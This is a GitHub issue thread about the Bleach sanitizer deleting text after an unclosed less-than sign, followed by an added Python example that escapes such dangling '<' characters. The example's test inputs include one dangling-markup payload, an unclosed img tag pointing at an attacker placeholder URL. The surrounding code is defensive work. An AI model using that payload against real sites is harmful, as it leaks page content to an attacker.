bug: Bleach should escape unclosed less than sign and render it instead of treating it as unclosed html. #590
bleach.clean(text) thinks a less-than sign without a closing greater-than sign is HTML and clears it from the output.

"a < b" -> "a < b"
"a<b" -> "a"

Bleach should escape an unclosed less-than sign and render it as "a<b", or offer an option to do so.

Comments

Huh, yeah

Bleach should escape it to avoid dangling markup attacks https://portswigger.net/web-security/cross-site-scripting/dangling-markup

Have a similar use case where bleach escapes greater-than or less-than signs used for value comparison. Example: 10 > 5. Since it is a comparison, HTML escaping shouldn't happen. How to handle such use cases in bleach.clean()?

I also have this problem, when my string contains e.g. "Related to all items <G1". However, this does not happen for

This was fixed in 5.0.1 and is a dupe of issue #544.
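The behaviour the issue and the dangling-markup comment describe, as an added example that is not part of Bleach or of this thread: a stdlib-only pre-pass that finds every `<` which does not open a closed tag and escapes it to `&lt;`, so "a<b", "Related to all items <G1" and a truncated `<img src="https://attacker.example/log?` payload (constructed here) are rendered as text instead of being eaten as an unfinished tag. The function names, the regex's definition of a "closed tag" (optional `/`, a letter-initial name, attributes with balanced quotes, a `>`), and the sample strings are assumptions of this example; the intent is to run it on input before handing the result to `bleach.clean()`, which is not called here.

```python
import re
from typing import List

# A closed tag, for our purposes: "<", optional "/", a tag name that starts with a
# letter, then attribute text in which a ">" is only allowed inside a quoted value,
# then ">". HTML comments are accepted as well so "<!-- x -->" is not mangled.
# Assumption of this example, not Bleach's own tokenizer.
_TAG_RE = re.compile(
    r"<!--.*?-->"                                  # HTML comment
    r"|</?[A-Za-z](?:[^<>\"']|\"[^\"]*\"|'[^']*')*>",  # opening/closing tag
    re.DOTALL,
)


def _tag_spans(text: str) -> List[tuple]:
    """Return (start, end) offsets of every closed tag in text."""
    return [(m.start(), m.end()) for m in _TAG_RE.finditer(text)]


def find_dangling_lt(text: str) -> List[int]:
    """Offsets of every '<' that is not part of a closed tag.

    A non-empty result means the string carries an unclosed '<' that a
    sanitizer would otherwise treat as the start of a tag (the dangling
    markup case), or plain text such as "a<b" that should survive escaping.
    """
    spans = _tag_spans(text)
    return [
        i for i, ch in enumerate(text)
        if ch == "<" and not any(s <= i < e for s, e in spans)
    ]


def escape_dangling_lt(text: str) -> str:
    """Replace every dangling '<' with '&lt;', leaving closed tags untouched."""
    chars = list(text)
    for i in find_dangling_lt(text):
        chars[i] = "&lt;"
    return "".join(chars)


if __name__ == "__main__":
    # Constructed inputs: the strings from the issue plus a dangling-markup payload.
    samples = [
        "a<b",
        "a < b",
        "Related to all items <G1",
        "<b>bold</b> and a<b",
        '<img src="https://attacker.example/log?',   # truncated tag, no closing ">"
        '<b title="x>y">ok</b>',                      # ">" inside a quoted attribute
    ]
    for s in samples:
        print(repr(s), "->", repr(escape_dangling_lt(s)), find_dangling_lt(s))
```

`find_dangling_lt` is the check and `escape_dangling_lt` the fix; keep both so logs can record that an input carried an unclosed `<` before it was neutralised. The pre-pass is deliberately conservative about what counts as a tag: `a<b and c>d` still parses as a `<b ...>` element, which is what an HTML5 parser does too, so tag-level decisions are left to the sanitizer that runs afterwards.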